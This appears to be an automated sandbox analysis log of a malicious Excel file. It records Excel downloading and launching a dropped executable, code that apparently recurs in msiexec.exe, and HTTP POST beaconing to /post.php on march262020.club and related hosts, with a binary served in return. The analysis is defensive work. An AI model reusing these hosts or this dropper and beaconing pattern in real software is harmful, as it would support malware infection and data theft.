Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 2_2_00428900 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then call 00419D40h | 2_2_00423380 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov esi, eax | 2_2_00424440 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 2_2_00423C00 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_0041D660 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then cmp word ptr [eax], cx | 2_2_00426E00 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 2_2_0041EF50 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then cmp word ptr [eax], cx | 2_2_003E7050 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov byte ptr [edi], bl | 2_2_003DD8B0 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 2_2_003DF1A0 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 2_2_003E8B50 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then call 003D9F90h | 2_2_003E35D0 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 2_2_003E3E50 |
Source: C:\cYNhYPc\mVVJuWs\FTBSEIi.exe | Code function: 4x nop then mov esi, eax | 2_2_003E4690 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx ecx, byte ptr [ebx+eax] | 4_2_00098900 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then call 00089D40h | 4_2_00093380 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx edx, byte ptr [eax+esi] | 4_2_00093C00 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then mov esi, eax | 4_2_00094440 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then cmp word ptr [eax], cx | 4_2_00096E00 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then mov byte ptr [edi], bl | 4_2_0008D660 |
Source: C:\Windows\System32\msiexec.exe | Code function: 4x nop then movzx ecx, byte ptr [eax] | 4_2_0008EF50 |
Source: global traffic | DNS query: name: march262020.club |
Source: global traffic | TCP traffic: 192.168.2.2:49160 -> 170.106.11.8:80 |
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.clubContent-Length: 300Connection: Close |
Source: global traffic | HTTP traffic detected: POST /post.php HTTP/1.1Accept: */*Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36Host: march262020.comContent-Length: 300Connection: Close |
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 27 Mar 2020 17:30:37 GMTContent-Type: application/octet-streamContent-Length: 245248Connection: keep-aliveLast-Modified: Fri, 27 Mar 2020 15:28:13 GMTETag: "3be00-5a1d7bfe43d40"Accept-Ranges: bytes |